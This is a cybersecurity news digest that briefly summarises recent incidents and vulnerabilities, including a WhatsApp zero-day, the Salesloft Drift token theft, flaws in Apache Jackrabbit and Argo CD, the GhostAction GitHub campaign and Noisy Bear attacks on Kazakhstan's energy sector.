Cyber Digests

CISA has issued an urgent warning regarding an actively exploited zero-day vulnerability in WhatsApp's linked device feature, which allows attackers to manipulate synchronization messages and potentially steal data or install malware. This critical vulnerability poses a significant risk to users globally and must be patched by federal and critical infrastructure organizations by September 23, 2025.

A widespread authentication token theft campaign targeted Salesforce instances via the Salesloft Drift platform, affecting organizations like Palo Alto Networks and Zscaler, with the threat actor exfiltrating data focusing on credentials and sensitive information. The incident highlights the need for enhanced security audits and stronger access controls to mitigate supply chain attacks.

A newly disclosed vulnerability in Apache Jackrabbit Core and JCR Commons allows JNDI injection, potentially leading to remote code execution, as the flaw stems from handling untrusted JNDI URIs in `JndiRepositoryFactory`, enabling deserialization of malicious data. Exploitation can result in arbitrary code execution, data exfiltration, or service disruption, impacting enterprise content management and web systems.

Ransomware group LunaLock has introduced a novel extortion tactic, threatening to release stolen digital art into AI training datasets if victims refuse to pay, exploiting creators' concerns about unauthorized AI scraping and intellectual property. The attack on Artists&Clients involved encrypting files and demanding $50,000 in cryptocurrency, highlighting the immediate operational disruption and unique psychological pressure on victims.

A critical vulnerability in Argo CD allows low-privileged API tokens to retrieve all associated repository credentials, bypassing isolation mechanisms, enabling tokens with even basic 'get' permissions to access sensitive usernames and passwords. Exploitation can lead to cloning private codebases, injecting malicious manifests, and supply chain attacks, affecting all Argo CD versions up to 2.13.0.

The Czech National Cyber and Information Security Agency issued a formal warning regarding products and services transferring user and system data to China, citing legal frameworks that compel data sharing with the state, which enables remote administration and potential misuse by state interests. Threat intelligence indicates a significant increase in intrusion activity and cloud targeting by Chinese operations, highlighting supply chain risks.

A supply-chain attack on Salesloft Drift led to a data breach at Zscaler, exposing customer information, as attackers exploited stolen OAuth tokens to access Salesforce environments, highlighting the persistence and adaptability of threat actors. The breach underscores the need for vigilance against phishing and social engineering attacks, as well as the importance of securing API tokens and customer authentication protocols.

A recent phishing campaign leveraged compromised AWS keys to weaponize Amazon Simple Email Service (SES), demonstrating novel techniques to bypass default restrictions and achieve industrial-scale email delivery, with attackers abusing the `PutAccountDetails` API to push SES accounts into production mode. The campaign utilized programmatic API calls and attempted privilege escalation, indicating sophisticated, automated tradecraft.

A widespread supply chain attack, dubbed 'GhostAction,' compromised hundreds of GitHub repositories by injecting malicious workflow files to exfiltrate over 3,325 CI/CD secrets, including publishing tokens and cloud credentials, which led to attempts to access AWS environments and database services. The campaign affected 327 developers across 817 repositories, impacting projects in multiple programming languages and entire SDK portfolios.

A newly identified APT group, Noisy Bear, is conducting a highly targeted campaign against Kazakhstan's energy sector, employing sophisticated social engineering and a multi-stage infection chain, utilizing open-source offensive tools and infrastructure from a sanctioned Russian hosting provider. The group uses spear-phishing from compromised internal accounts to deliver malicious LNK files and inject Meterpreter shellcode.